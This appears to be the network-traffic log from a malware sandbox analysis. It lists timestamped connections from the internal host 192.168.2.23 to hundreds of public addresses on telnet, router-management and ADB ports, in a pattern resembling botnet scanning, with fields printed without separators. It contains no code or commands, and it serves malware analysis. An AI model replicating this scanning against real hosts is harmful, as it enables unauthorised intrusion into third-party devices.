                                                                        Dec 6, 2024 00:37:06.943484068 CET3410281192.168.2.23139.196.105.183
                                                                        Dec 6, 2024 00:37:06.943505049 CET6030680192.168.2.23112.166.114.199
                                                                        Dec 6, 2024 00:37:06.943506002 CET363268080192.168.2.23220.74.129.133
                                                                        Dec 6, 2024 00:37:06.943881989 CET3787680192.168.2.2370.159.0.172
                                                                        Dec 6, 2024 00:37:06.944242001 CET3281437215192.168.2.23197.72.9.100
                                                                        Dec 6, 2024 00:37:06.944622993 CET4177280192.168.2.2363.164.211.208
                                                                        Dec 6, 2024 00:37:06.944983959 CET5643837215192.168.2.2398.179.93.63
                                                                        Dec 6, 2024 00:37:06.945347071 CET573968080192.168.2.23132.109.208.103
                                                                        Dec 6, 2024 00:37:06.945724010 CET393048080192.168.2.23181.25.123.235
                                                                        Dec 6, 2024 00:37:06.946079969 CET4834037215192.168.2.2379.132.196.216
                                                                        Dec 6, 2024 00:37:06.946101904 CET474968443192.168.2.23175.207.134.61
                                                                        Dec 6, 2024 00:37:06.946487904 CET542828080192.168.2.23153.94.23.173
                                                                        Dec 6, 2024 00:37:06.946842909 CET555248080192.168.2.2377.17.189.40
                                                                        Dec 6, 2024 00:37:06.947267056 CET5325681192.168.2.2391.100.12.254
                                                                        Dec 6, 2024 00:37:06.947566032 CET494345555192.168.2.2341.161.214.192
                                                                        Dec 6, 2024 00:37:06.971673012 CET2341973100.48.164.217192.168.2.23
                                                                        Dec 6, 2024 00:37:06.971714020 CET102341973200.46.215.144192.168.2.23
                                                                        Dec 6, 2024 00:37:06.971731901 CET4197323192.168.2.23100.48.164.217
                                                                        Dec 6, 2024 00:37:06.971745968 CET2341973182.155.138.180192.168.2.23
                                                                        Dec 6, 2024 00:37:06.971762896 CET419731023192.168.2.23200.46.215.144
                                                                        Dec 6, 2024 00:37:06.971800089 CET4197323192.168.2.23182.155.138.180
                                                                        Dec 6, 2024 00:37:06.974701881 CET234197387.197.91.201192.168.2.23
                                                                        Dec 6, 2024 00:37:06.974745989 CET4197323192.168.2.2387.197.91.201
                                                                        Dec 6, 2024 00:37:06.974761963 CET2341973183.227.205.112192.168.2.23
                                                                        Dec 6, 2024 00:37:06.974771976 CET234197385.149.35.145192.168.2.23
                                                                        Dec 6, 2024 00:37:06.974808931 CET4197323192.168.2.2385.149.35.145
                                                                        Dec 6, 2024 00:37:06.974812031 CET4197323192.168.2.23183.227.205.112
                                                                        Dec 6, 2024 00:37:06.978262901 CET2341973107.171.6.89192.168.2.23
                                                                        Dec 6, 2024 00:37:06.978303909 CET4197323192.168.2.23107.171.6.89
                                                                        Dec 6, 2024 00:37:06.978338003 CET234197317.1.58.43192.168.2.23
                                                                        Dec 6, 2024 00:37:06.978348970 CET234197373.136.28.170192.168.2.23
                                                                        Dec 6, 2024 00:37:06.978363991 CET2341973175.201.72.186192.168.2.23
                                                                        Dec 6, 2024 00:37:06.978377104 CET4197323192.168.2.2317.1.58.43
                                                                        Dec 6, 2024 00:37:06.978379965 CET23234197327.104.167.190192.168.2.23
                                                                        Dec 6, 2024 00:37:06.978399038 CET23419739.179.163.105192.168.2.23
                                                                        Dec 6, 2024 00:37:06.978400946 CET4197323192.168.2.23175.201.72.186
                                                                        Dec 6, 2024 00:37:06.978409052 CET234197314.44.170.14192.168.2.23
                                                                        Dec 6, 2024 00:37:06.978420973 CET419732323192.168.2.2327.104.167.190
                                                                        Dec 6, 2024 00:37:06.978425980 CET2341973175.62.163.223192.168.2.23
                                                                        Dec 6, 2024 00:37:06.978434086 CET4197323192.168.2.2373.136.28.170
                                                                        Dec 6, 2024 00:37:06.978435040 CET2341973193.170.137.88192.168.2.23
                                                                        Dec 6, 2024 00:37:06.978435040 CET4197323192.168.2.239.179.163.105
                                                                        Dec 6, 2024 00:37:06.978435040 CET4197323192.168.2.2314.44.170.14
                                                                        Dec 6, 2024 00:37:06.978445053 CET2341973123.252.125.208192.168.2.23
                                                                        Dec 6, 2024 00:37:06.978455067 CET4197323192.168.2.23175.62.163.223
                                                                        Dec 6, 2024 00:37:06.978466034 CET2341973183.120.216.29192.168.2.23
                                                                        Dec 6, 2024 00:37:06.978475094 CET4197323192.168.2.23193.170.137.88
                                                                        Dec 6, 2024 00:37:06.978481054 CET234197342.174.139.168192.168.2.23
                                                                        Dec 6, 2024 00:37:06.978482962 CET4197323192.168.2.23123.252.125.208
                                                                        Dec 6, 2024 00:37:06.978491068 CET2341973151.43.32.186192.168.2.23
                                                                        Dec 6, 2024 00:37:06.978506088 CET232341973165.101.122.72192.168.2.23
                                                                        Dec 6, 2024 00:37:06.978511095 CET4197323192.168.2.23183.120.216.29
                                                                        Dec 6, 2024 00:37:06.978516102 CET2341973184.80.190.122192.168.2.23
                                                                        Dec 6, 2024 00:37:06.978528976 CET4197323192.168.2.2342.174.139.168
                                                                        Dec 6, 2024 00:37:06.978534937 CET4197323192.168.2.23151.43.32.186
                                                                        Dec 6, 2024 00:37:06.978543997 CET4197323192.168.2.23184.80.190.122
                                                                        Dec 6, 2024 00:37:06.978544950 CET419732323192.168.2.23165.101.122.72
                                                                        Dec 6, 2024 00:37:06.978591919 CET234197317.99.0.31192.168.2.23
                                                                        Dec 6, 2024 00:37:06.978601933 CET2341973203.179.0.33192.168.2.23
                                                                        Dec 6, 2024 00:37:06.978610039 CET2341973105.225.85.218192.168.2.23
                                                                        Dec 6, 2024 00:37:06.978619099 CET234197345.181.72.186192.168.2.23
                                                                        Dec 6, 2024 00:37:06.978629112 CET234197382.1.68.189192.168.2.23
                                                                        Dec 6, 2024 00:37:06.978629112 CET4197323192.168.2.2317.99.0.31
                                                                        Dec 6, 2024 00:37:06.978632927 CET4197323192.168.2.23203.179.0.33
                                                                        Dec 6, 2024 00:37:06.978640079 CET2341973130.234.168.85192.168.2.23
                                                                        Dec 6, 2024 00:37:06.978648901 CET4197323192.168.2.23105.225.85.218
                                                                        Dec 6, 2024 00:37:06.978650093 CET234197387.117.58.169192.168.2.23
                                                                        Dec 6, 2024 00:37:06.978660107 CET234197381.197.152.167192.168.2.23
                                                                        Dec 6, 2024 00:37:06.978661060 CET4197323192.168.2.2345.181.72.186
                                                                        Dec 6, 2024 00:37:06.978665113 CET4197323192.168.2.2382.1.68.189
                                                                        Dec 6, 2024 00:37:06.978669882 CET2341973119.134.175.77192.168.2.23
                                                                        Dec 6, 2024 00:37:06.978677034 CET23234197390.184.128.52192.168.2.23
                                                                        Dec 6, 2024 00:37:06.978679895 CET4197323192.168.2.23130.234.168.85
                                                                        Dec 6, 2024 00:37:06.978687048 CET2341973216.99.25.226192.168.2.23
                                                                        Dec 6, 2024 00:37:06.978688955 CET4197323192.168.2.2387.117.58.169
                                                                        Dec 6, 2024 00:37:06.978693008 CET4197323192.168.2.2381.197.152.167
                                                                        Dec 6, 2024 00:37:06.978696108 CET4197323192.168.2.23119.134.175.77
                                                                        Dec 6, 2024 00:37:06.978697062 CET2341973213.65.153.28192.168.2.23
                                                                        Dec 6, 2024 00:37:06.978705883 CET2341973185.63.215.190192.168.2.23
                                                                        Dec 6, 2024 00:37:06.978714943 CET419732323192.168.2.2390.184.128.52
                                                                        Dec 6, 2024 00:37:06.978733063 CET4197323192.168.2.23216.99.25.226
                                                                        Dec 6, 2024 00:37:06.978733063 CET4197323192.168.2.23213.65.153.28
                                                                        Dec 6, 2024 00:37:06.978755951 CET4197323192.168.2.23185.63.215.190
                                                                        Dec 6, 2024 00:37:06.979051113 CET2341973178.18.166.204192.168.2.23
                                                                        Dec 6, 2024 00:37:06.979060888 CET234197391.14.189.241192.168.2.23
                                                                        Dec 6, 2024 00:37:06.979075909 CET2341973182.155.42.107192.168.2.23
                                                                        Dec 6, 2024 00:37:06.979091883 CET2341973112.62.81.231192.168.2.23
                                                                        Dec 6, 2024 00:37:06.979099989 CET2341973172.59.1.102192.168.2.23
                                                                        Dec 6, 2024 00:37:06.979108095 CET23234197327.158.104.22192.168.2.23
                                                                        Dec 6, 2024 00:37:06.979115009 CET4197323192.168.2.23182.155.42.107
                                                                        Dec 6, 2024 00:37:06.979131937 CET4197323192.168.2.23112.62.81.231
                                                                        Dec 6, 2024 00:37:06.979146004 CET4197323192.168.2.2391.14.189.241
                                                                        Dec 6, 2024 00:37:06.979151011 CET4197323192.168.2.23178.18.166.204
                                                                        Dec 6, 2024 00:37:06.979151011 CET4197323192.168.2.23172.59.1.102
                                                                        Dec 6, 2024 00:37:06.979156971 CET419732323192.168.2.2327.158.104.22
                                                                        Dec 6, 2024 00:37:06.979157925 CET2341973162.53.243.217192.168.2.23
                                                                        Dec 6, 2024 00:37:06.979177952 CET2341973118.71.99.75192.168.2.23
                                                                        Dec 6, 2024 00:37:06.979187012 CET2341973148.171.137.143192.168.2.23
                                                                        Dec 6, 2024 00:37:06.979195118 CET234197369.214.105.251192.168.2.23
                                                                        Dec 6, 2024 00:37:06.979197979 CET4197323192.168.2.23162.53.243.217
                                                                        Dec 6, 2024 00:37:06.979213953 CET2341973176.153.195.112192.168.2.23
                                                                        Dec 6, 2024 00:37:06.979221106 CET4197323192.168.2.23148.171.137.143
                                                                        Dec 6, 2024 00:37:06.979221106 CET4197323192.168.2.2369.214.105.251
                                                                        Dec 6, 2024 00:37:06.979232073 CET4197323192.168.2.23118.71.99.75
                                                                        Dec 6, 2024 00:37:06.979235888 CET2341973154.129.0.108192.168.2.23
                                                                        Dec 6, 2024 00:37:06.979244947 CET234197368.245.242.12192.168.2.23
                                                                        Dec 6, 2024 00:37:06.979252100 CET4197323192.168.2.23176.153.195.112
                                                                        Dec 6, 2024 00:37:06.979262114 CET2341973157.194.33.89192.168.2.23
                                                                        Dec 6, 2024 00:37:06.979270935 CET234197353.109.178.183192.168.2.23
                                                                        Dec 6, 2024 00:37:06.979279995 CET4197323192.168.2.2368.245.242.12
                                                                        Dec 6, 2024 00:37:06.979285955 CET232341973188.197.221.93192.168.2.23
                                                                        Dec 6, 2024 00:37:06.979288101 CET4197323192.168.2.23154.129.0.108
                                                                        Dec 6, 2024 00:37:06.979295015 CET2341973174.250.200.105192.168.2.23
                                                                        Dec 6, 2024 00:37:06.979298115 CET4197323192.168.2.23157.194.33.89
                                                                        Dec 6, 2024 00:37:06.979300976 CET4197323192.168.2.2353.109.178.183
                                                                        Dec 6, 2024 00:37:06.979306936 CET234197354.55.101.181192.168.2.23
                                                                        Dec 6, 2024 00:37:06.979310989 CET419732323192.168.2.23188.197.221.93
                                                                        Dec 6, 2024 00:37:06.979321003 CET2341973102.147.131.242192.168.2.23
                                                                        Dec 6, 2024 00:37:06.979331017 CET4197323192.168.2.23174.250.200.105
                                                                        Dec 6, 2024 00:37:06.979331970 CET234197338.65.199.95192.168.2.23
                                                                        Dec 6, 2024 00:37:06.979351044 CET4197323192.168.2.2354.55.101.181
                                                                        Dec 6, 2024 00:37:06.979367018 CET4197323192.168.2.2338.65.199.95
                                                                        Dec 6, 2024 00:37:06.979371071 CET4197323192.168.2.23102.147.131.242
                                                                        Dec 6, 2024 00:37:06.979386091 CET2341973115.183.72.22192.168.2.23
                                                                        Dec 6, 2024 00:37:06.979394913 CET2341973197.119.147.40192.168.2.23
                                                                        Dec 6, 2024 00:37:06.979403019 CET2341973193.0.59.86192.168.2.23
                                                                        Dec 6, 2024 00:37:06.979410887 CET2341973109.157.190.195192.168.2.23
                                                                        Dec 6, 2024 00:37:06.979415894 CET232341973158.117.17.131192.168.2.23
                                                                        Dec 6, 2024 00:37:06.979425907 CET2341973186.251.87.209192.168.2.23
                                                                        Dec 6, 2024 00:37:06.979433060 CET4197323192.168.2.23193.0.59.86
                                                                        Dec 6, 2024 00:37:06.979434967 CET4197323192.168.2.23115.183.72.22
                                                                        Dec 6, 2024 00:37:06.979435921 CET2341973164.65.22.138192.168.2.23
                                                                        Dec 6, 2024 00:37:06.979437113 CET4197323192.168.2.23197.119.147.40
                                                                        Dec 6, 2024 00:37:06.979446888 CET2341973124.79.232.69192.168.2.23
                                                                        Dec 6, 2024 00:37:06.979453087 CET4197323192.168.2.23109.157.190.195
                                                                        Dec 6, 2024 00:37:06.979454041 CET419732323192.168.2.23158.117.17.131
                                                                        Dec 6, 2024 00:37:06.979456902 CET4197323192.168.2.23186.251.87.209
                                                                        Dec 6, 2024 00:37:06.979469061 CET4197323192.168.2.23164.65.22.138
                                                                        Dec 6, 2024 00:37:06.979485989 CET4197323192.168.2.23124.79.232.69
                                                                        Dec 6, 2024 00:37:06.979844093 CET2341973181.142.236.204192.168.2.23
                                                                        Dec 6, 2024 00:37:06.979854107 CET2341973131.2.193.14192.168.2.23
                                                                        Dec 6, 2024 00:37:06.979861975 CET23419739.6.39.72192.168.2.23
                                                                        Dec 6, 2024 00:37:06.979871035 CET2341973181.123.56.238192.168.2.23
                                                                        Dec 6, 2024 00:37:06.979878902 CET2323419732.148.182.163192.168.2.23
                                                                        Dec 6, 2024 00:37:06.979878902 CET4197323192.168.2.23181.142.236.204
                                                                        Dec 6, 2024 00:37:06.979886055 CET4197323192.168.2.23131.2.193.14
                                                                        Dec 6, 2024 00:37:06.979888916 CET4197323192.168.2.239.6.39.72
                                                                        Dec 6, 2024 00:37:06.979908943 CET4197323192.168.2.23181.123.56.238
                                                                        Dec 6, 2024 00:37:06.979918003 CET419732323192.168.2.232.148.182.163
                                                                        Dec 6, 2024 00:37:06.979940891 CET2341973206.247.249.147192.168.2.23
                                                                        Dec 6, 2024 00:37:06.979950905 CET234197384.7.227.205192.168.2.23
                                                                        Dec 6, 2024 00:37:06.979964018 CET234197371.119.251.159192.168.2.23
                                                                        Dec 6, 2024 00:37:06.979973078 CET2341973115.42.191.171192.168.2.23
                                                                        Dec 6, 2024 00:37:06.979980946 CET2341973221.165.248.208192.168.2.23
                                                                        Dec 6, 2024 00:37:06.979981899 CET4197323192.168.2.2384.7.227.205
                                                                        Dec 6, 2024 00:37:06.979983091 CET4197323192.168.2.23206.247.249.147
                                                                        Dec 6, 2024 00:37:06.979990005 CET2341973126.81.233.82192.168.2.23
                                                                        Dec 6, 2024 00:37:06.980007887 CET2341973202.169.240.245192.168.2.23
                                                                        Dec 6, 2024 00:37:06.980010033 CET4197323192.168.2.23115.42.191.171
                                                                        Dec 6, 2024 00:37:06.980011940 CET4197323192.168.2.2371.119.251.159
                                                                        Dec 6, 2024 00:37:06.980021000 CET2341973162.23.201.215192.168.2.23
                                                                        Dec 6, 2024 00:37:06.980021954 CET4197323192.168.2.23221.165.248.208
                                                                        Dec 6, 2024 00:37:06.980036020 CET4197323192.168.2.23126.81.233.82
                                                                        Dec 6, 2024 00:37:06.980038881 CET2341973178.94.3.109192.168.2.23
                                                                        Dec 6, 2024 00:37:06.980053902 CET2341973165.2.118.245192.168.2.23
                                                                        Dec 6, 2024 00:37:06.980057955 CET4197323192.168.2.23202.169.240.245
                                                                        Dec 6, 2024 00:37:06.980062962 CET4197323192.168.2.23162.23.201.215
                                                                        Dec 6, 2024 00:37:06.980062962 CET2341973135.162.227.11192.168.2.23
                                                                        Dec 6, 2024 00:37:06.980073929 CET234197392.42.190.240192.168.2.23
                                                                        Dec 6, 2024 00:37:06.980077982 CET4197323192.168.2.23178.94.3.109
                                                                        Dec 6, 2024 00:37:06.980093002 CET232341973125.26.139.21192.168.2.23
                                                                        Dec 6, 2024 00:37:06.980097055 CET4197323192.168.2.23165.2.118.245
                                                                        Dec 6, 2024 00:37:06.980101109 CET4197323192.168.2.23135.162.227.11
                                                                        Dec 6, 2024 00:37:06.980103016 CET234197376.195.177.157192.168.2.23
                                                                        Dec 6, 2024 00:37:06.980112076 CET2341973188.98.100.109192.168.2.23
                                                                        Dec 6, 2024 00:37:06.980117083 CET4197323192.168.2.2392.42.190.240
                                                                        Dec 6, 2024 00:37:06.980132103 CET419732323192.168.2.23125.26.139.21
                                                                        Dec 6, 2024 00:37:06.980137110 CET2341973217.161.24.184192.168.2.23
                                                                        Dec 6, 2024 00:37:06.980139971 CET4197323192.168.2.2376.195.177.157
                                                                        Dec 6, 2024 00:37:06.980144024 CET4197323192.168.2.23188.98.100.109
                                                                        Dec 6, 2024 00:37:06.980146885 CET234197374.151.62.218192.168.2.23
                                                                        Dec 6, 2024 00:37:06.980155945 CET234197383.105.150.248192.168.2.23
                                                                        Dec 6, 2024 00:37:06.980164051 CET2341973169.187.1.14192.168.2.23
                                                                        Dec 6, 2024 00:37:06.980171919 CET234197344.13.196.4192.168.2.23
                                                                        Dec 6, 2024 00:37:06.980175018 CET4197323192.168.2.23217.161.24.184
                                                                        Dec 6, 2024 00:37:06.980180025 CET234197395.48.22.40192.168.2.23
                                                                        Dec 6, 2024 00:37:06.980189085 CET234197337.66.169.139192.168.2.23
                                                                        Dec 6, 2024 00:37:06.980190039 CET4197323192.168.2.2374.151.62.218
                                                                        Dec 6, 2024 00:37:06.980190992 CET4197323192.168.2.2383.105.150.248
                                                                        Dec 6, 2024 00:37:06.980197906 CET4197323192.168.2.23169.187.1.14
                                                                        Dec 6, 2024 00:37:06.980202913 CET4197323192.168.2.2344.13.196.4
                                                                        Dec 6, 2024 00:37:06.980209112 CET4197323192.168.2.2395.48.22.40
                                                                        Dec 6, 2024 00:37:06.980226994 CET4197323192.168.2.2337.66.169.139
                                                                        Dec 6, 2024 00:37:06.980242968 CET2341973218.138.145.211192.168.2.23
                                                                        Dec 6, 2024 00:37:06.980279922 CET4197323192.168.2.23218.138.145.211
                                                                        Dec 6, 2024 00:37:06.980644941 CET234197382.130.141.113192.168.2.23
                                                                        Dec 6, 2024 00:37:06.980681896 CET4197323192.168.2.2382.130.141.113
                                                                        Dec 6, 2024 00:37:06.980686903 CET2341973108.78.195.27192.168.2.23
                                                                        Dec 6, 2024 00:37:06.980698109 CET23419739.151.24.138192.168.2.23
                                                                        Dec 6, 2024 00:37:06.980722904 CET232341973213.19.46.120192.168.2.23
                                                                        Dec 6, 2024 00:37:06.980726957 CET4197323192.168.2.239.151.24.138
                                                                        Dec 6, 2024 00:37:06.980730057 CET4197323192.168.2.23108.78.195.27
                                                                        Dec 6, 2024 00:37:06.980731964 CET23419734.122.102.45192.168.2.23
                                                                        Dec 6, 2024 00:37:06.980741024 CET2341973111.70.5.249192.168.2.23
                                                                        Dec 6, 2024 00:37:06.980762959 CET4197323192.168.2.234.122.102.45
                                                                        Dec 6, 2024 00:37:06.980768919 CET419732323192.168.2.23213.19.46.120
                                                                        Dec 6, 2024 00:37:06.980768919 CET4197323192.168.2.23111.70.5.249
                                                                        Dec 6, 2024 00:37:06.980797052 CET234197393.120.249.214192.168.2.23
                                                                        Dec 6, 2024 00:37:06.980807066 CET234197358.46.126.126192.168.2.23
                                                                        Dec 6, 2024 00:37:06.980811119 CET2341973188.110.246.195192.168.2.23
                                                                        Dec 6, 2024 00:37:06.980814934 CET232341973223.157.57.81192.168.2.23
                                                                        Dec 6, 2024 00:37:06.980835915 CET4197323192.168.2.2393.120.249.214
                                                                        Dec 6, 2024 00:37:06.980840921 CET4197323192.168.2.2358.46.126.126
                                                                        Dec 6, 2024 00:37:06.980849981 CET419732323192.168.2.23223.157.57.81
                                                                        Dec 6, 2024 00:37:06.980851889 CET4197323192.168.2.23188.110.246.195
                                                                        Dec 6, 2024 00:37:06.980892897 CET2341973221.211.138.53192.168.2.23
                                                                        Dec 6, 2024 00:37:06.980901003 CET2341973201.144.130.177192.168.2.23
                                                                        Dec 6, 2024 00:37:06.980916023 CET234197335.236.170.3192.168.2.23
                                                                        Dec 6, 2024 00:37:06.980925083 CET2341973152.162.65.50192.168.2.23
                                                                        Dec 6, 2024 00:37:06.980928898 CET4197323192.168.2.23221.211.138.53
                                                                        Dec 6, 2024 00:37:06.980933905 CET2341973126.55.185.255192.168.2.23
                                                                        Dec 6, 2024 00:37:06.980943918 CET2341973167.198.174.5192.168.2.23
                                                                        Dec 6, 2024 00:37:06.980946064 CET4197323192.168.2.2335.236.170.3
                                                                        Dec 6, 2024 00:37:06.980947018 CET4197323192.168.2.23201.144.130.177
                                                                        Dec 6, 2024 00:37:06.980952978 CET234197357.71.40.167192.168.2.23
                                                                        Dec 6, 2024 00:37:06.980954885 CET4197323192.168.2.23152.162.65.50
                                                                        Dec 6, 2024 00:37:06.980964899 CET23419738.131.69.188192.168.2.23
                                                                        Dec 6, 2024 00:37:06.980968952 CET4197323192.168.2.23167.198.174.5
                                                                        Dec 6, 2024 00:37:06.980974913 CET232341973198.73.141.236192.168.2.23
                                                                        Dec 6, 2024 00:37:06.980986118 CET4197323192.168.2.2357.71.40.167
                                                                        Dec 6, 2024 00:37:06.980993032 CET4197323192.168.2.238.131.69.188
                                                                        Dec 6, 2024 00:37:06.980998039 CET4197323192.168.2.23126.55.185.255
                                                                        Dec 6, 2024 00:37:06.981012106 CET419732323192.168.2.23198.73.141.236
                                                                        Dec 6, 2024 00:37:06.981100082 CET2341973155.247.64.174192.168.2.23
                                                                        Dec 6, 2024 00:37:06.981110096 CET2341973142.13.52.249192.168.2.23
                                                                        Dec 6, 2024 00:37:06.981117964 CET234197389.125.253.249192.168.2.23
                                                                        Dec 6, 2024 00:37:06.981126070 CET2341973149.73.23.174192.168.2.23
                                                                        Dec 6, 2024 00:37:06.981134892 CET234197386.2.136.169192.168.2.23
                                                                        Dec 6, 2024 00:37:06.981136084 CET4197323192.168.2.23155.247.64.174
                                                                        Dec 6, 2024 00:37:06.981142044 CET4197323192.168.2.23142.13.52.249
                                                                        Dec 6, 2024 00:37:06.981144905 CET23419735.51.223.90192.168.2.23
                                                                        Dec 6, 2024 00:37:06.981161118 CET4197323192.168.2.23149.73.23.174
                                                                        Dec 6, 2024 00:37:06.981164932 CET2341973191.22.84.64192.168.2.23
                                                                        Dec 6, 2024 00:37:06.981174946 CET2341973211.55.45.127192.168.2.23
                                                                        Dec 6, 2024 00:37:06.981178045 CET4197323192.168.2.2389.125.253.249
                                                                        Dec 6, 2024 00:37:06.981179953 CET4197323192.168.2.2386.2.136.169
                                                                        Dec 6, 2024 00:37:06.981180906 CET4197323192.168.2.235.51.223.90
                                                                        Dec 6, 2024 00:37:06.981184006 CET234197368.90.226.183192.168.2.23
                                                                        Dec 6, 2024 00:37:06.981192112 CET4197323192.168.2.23191.22.84.64
                                                                        Dec 6, 2024 00:37:06.981201887 CET4197323192.168.2.23211.55.45.127
                                                                        Dec 6, 2024 00:37:06.981239080 CET4197323192.168.2.2368.90.226.183
                                                                        Dec 6, 2024 00:37:06.981508970 CET2341973164.31.168.157192.168.2.23
                                                                        Dec 6, 2024 00:37:06.981518030 CET232341973195.133.8.123192.168.2.23
                                                                        Dec 6, 2024 00:37:06.981554985 CET10234197340.189.195.112192.168.2.23
                                                                        Dec 6, 2024 00:37:06.981564045 CET234197331.181.208.186192.168.2.23
                                                                        Dec 6, 2024 00:37:06.981573105 CET2341973157.81.178.130192.168.2.23
                                                                        Dec 6, 2024 00:37:06.981581926 CET2341973151.219.219.187192.168.2.23
                                                                        Dec 6, 2024 00:37:06.981586933 CET419732323192.168.2.23195.133.8.123
                                                                        Dec 6, 2024 00:37:06.981586933 CET4197323192.168.2.23164.31.168.157
                                                                        Dec 6, 2024 00:37:06.981601954 CET419731023192.168.2.2340.189.195.112
                                                                        Dec 6, 2024 00:37:06.981601954 CET4197323192.168.2.2331.181.208.186
                                                                        Dec 6, 2024 00:37:06.981601954 CET4197323192.168.2.23151.219.219.187
                                                                        Dec 6, 2024 00:37:06.981601954 CET4197323192.168.2.23157.81.178.130
                                                                        Dec 6, 2024 00:37:06.981628895 CET2341973111.210.22.132192.168.2.23
                                                                        Dec 6, 2024 00:37:06.981638908 CET234197375.11.64.140192.168.2.23
                                                                        Dec 6, 2024 00:37:06.981647015 CET2341973100.245.152.232192.168.2.23
                                                                        Dec 6, 2024 00:37:06.981657982 CET2323419732.141.22.127192.168.2.23
                                                                        Dec 6, 2024 00:37:06.981667042 CET4197323192.168.2.23111.210.22.132
                                                                        Dec 6, 2024 00:37:06.981673956 CET4197323192.168.2.2375.11.64.140
                                                                        Dec 6, 2024 00:37:06.981683969 CET4197323192.168.2.23100.245.152.232
                                                                        Dec 6, 2024 00:37:06.981688023 CET2341973111.56.216.7192.168.2.23
                                                                        Dec 6, 2024 00:37:06.981698036 CET234197395.115.38.229192.168.2.23
                                                                        Dec 6, 2024 00:37:06.981700897 CET419732323192.168.2.232.141.22.127
                                                                        Dec 6, 2024 00:37:06.981713057 CET2341973155.4.99.76192.168.2.23
                                                                        Dec 6, 2024 00:37:06.981720924 CET4197323192.168.2.23111.56.216.7
                                                                        Dec 6, 2024 00:37:06.981723070 CET2341973221.139.235.125192.168.2.23
                                                                        Dec 6, 2024 00:37:06.981725931 CET4197323192.168.2.2395.115.38.229
                                                                        Dec 6, 2024 00:37:06.981743097 CET2341973104.120.161.25192.168.2.23
                                                                        Dec 6, 2024 00:37:06.981745958 CET4197323192.168.2.23155.4.99.76
                                                                        Dec 6, 2024 00:37:06.981753111 CET2341973217.33.139.135192.168.2.23
                                                                        Dec 6, 2024 00:37:06.981760979 CET2341973115.198.101.68192.168.2.23
                                                                        Dec 6, 2024 00:37:06.981770039 CET4197323192.168.2.23221.139.235.125
                                                                        Dec 6, 2024 00:37:06.981770039 CET234197346.251.48.187192.168.2.23
                                                                        Dec 6, 2024 00:37:06.981780052 CET234197320.212.33.159192.168.2.23
                                                                        Dec 6, 2024 00:37:06.981781006 CET4197323192.168.2.23104.120.161.25
                                                                        Dec 6, 2024 00:37:06.981786013 CET4197323192.168.2.23217.33.139.135
                                                                        Dec 6, 2024 00:37:06.981786966 CET4197323192.168.2.23115.198.101.68
                                                                        Dec 6, 2024 00:37:06.981791019 CET2341973180.28.7.21192.168.2.23
                                                                        Dec 6, 2024 00:37:06.981822968 CET4197323192.168.2.23180.28.7.21
                                                                        Dec 6, 2024 00:37:06.981825113 CET4197323192.168.2.2320.212.33.159
                                                                        Dec 6, 2024 00:37:06.981826067 CET4197323192.168.2.2346.251.48.187
                                                                        Dec 6, 2024 00:37:06.981839895 CET234197379.34.192.78192.168.2.23
                                                                        Dec 6, 2024 00:37:06.981849909 CET232341973186.233.121.16192.168.2.23
                                                                        Dec 6, 2024 00:37:06.981858015 CET2341973201.253.116.137192.168.2.23
                                                                        Dec 6, 2024 00:37:06.981862068 CET2341973167.202.18.125192.168.2.23
                                                                        Dec 6, 2024 00:37:06.981872082 CET2341973173.22.179.9192.168.2.23
                                                                        Dec 6, 2024 00:37:06.981878996 CET234197320.204.11.170192.168.2.23
                                                                        Dec 6, 2024 00:37:06.981879950 CET4197323192.168.2.2379.34.192.78
                                                                        Dec 6, 2024 00:37:06.981889009 CET234197388.160.138.153192.168.2.23
                                                                        Dec 6, 2024 00:37:06.981890917 CET419732323192.168.2.23186.233.121.16
                                                                        Dec 6, 2024 00:37:06.981890917 CET4197323192.168.2.23201.253.116.137
                                                                        Dec 6, 2024 00:37:06.981898069 CET2341973162.214.130.200192.168.2.23
                                                                        Dec 6, 2024 00:37:06.981904030 CET4197323192.168.2.23167.202.18.125
                                                                        Dec 6, 2024 00:37:06.981906891 CET4197323192.168.2.23173.22.179.9
                                                                        Dec 6, 2024 00:37:06.981921911 CET4197323192.168.2.2320.204.11.170
                                                                        Dec 6, 2024 00:37:06.981933117 CET4197323192.168.2.2388.160.138.153
                                                                        Dec 6, 2024 00:37:06.981933117 CET4197323192.168.2.23162.214.130.200
                                                                        Dec 6, 2024 00:37:06.982065916 CET2341973194.196.75.228192.168.2.23
                                                                        Dec 6, 2024 00:37:06.982089043 CET2341973212.100.181.84192.168.2.23
                                                                        Dec 6, 2024 00:37:06.982099056 CET2341973168.223.39.100192.168.2.23
                                                                        Dec 6, 2024 00:37:06.982105970 CET2341973182.141.18.29192.168.2.23
                                                                        Dec 6, 2024 00:37:06.982115984 CET234197382.171.152.99192.168.2.23
                                                                        Dec 6, 2024 00:37:06.982116938 CET4197323192.168.2.23194.196.75.228
                                                                        Dec 6, 2024 00:37:06.982131004 CET232341973100.166.44.48192.168.2.23
                                                                        Dec 6, 2024 00:37:06.982131004 CET4197323192.168.2.23168.223.39.100
                                                                        Dec 6, 2024 00:37:06.982132912 CET4197323192.168.2.23212.100.181.84
                                                                        Dec 6, 2024 00:37:06.982141018 CET2341973125.140.165.46192.168.2.23
                                                                        Dec 6, 2024 00:37:06.982150078 CET4197323192.168.2.23182.141.18.29
                                                                        Dec 6, 2024 00:37:06.982150078 CET4197323192.168.2.2382.171.152.99
                                                                        Dec 6, 2024 00:37:06.982151031 CET2341973163.65.214.214192.168.2.23
                                                                        Dec 6, 2024 00:37:06.982170105 CET4197323192.168.2.23125.140.165.46
                                                                        Dec 6, 2024 00:37:06.982172966 CET419732323192.168.2.23100.166.44.48
                                                                        Dec 6, 2024 00:37:06.982176065 CET234197353.39.149.101192.168.2.23
                                                                        Dec 6, 2024 00:37:06.982184887 CET2341973179.50.151.243192.168.2.23
                                                                        Dec 6, 2024 00:37:06.982192993 CET2341973197.238.44.19192.168.2.23
                                                                        Dec 6, 2024 00:37:06.982201099 CET234197372.82.150.182192.168.2.23
                                                                        Dec 6, 2024 00:37:06.982219934 CET4197323192.168.2.2353.39.149.101
                                                                        Dec 6, 2024 00:37:06.982223988 CET4197323192.168.2.23163.65.214.214
                                                                        Dec 6, 2024 00:37:06.982223988 CET4197323192.168.2.23179.50.151.243
                                                                        Dec 6, 2024 00:37:06.982223988 CET4197323192.168.2.23197.238.44.19
                                                                        Dec 6, 2024 00:37:06.982233047 CET4197323192.168.2.2372.82.150.182
                                                                        Dec 6, 2024 00:37:07.006350040 CET2351478213.145.174.181192.168.2.23
                                                                        Dec 6, 2024 00:37:07.006624937 CET5147823192.168.2.23213.145.174.181
                                                                        Dec 6, 2024 00:37:07.040836096 CET466745555192.168.2.2346.158.65.38
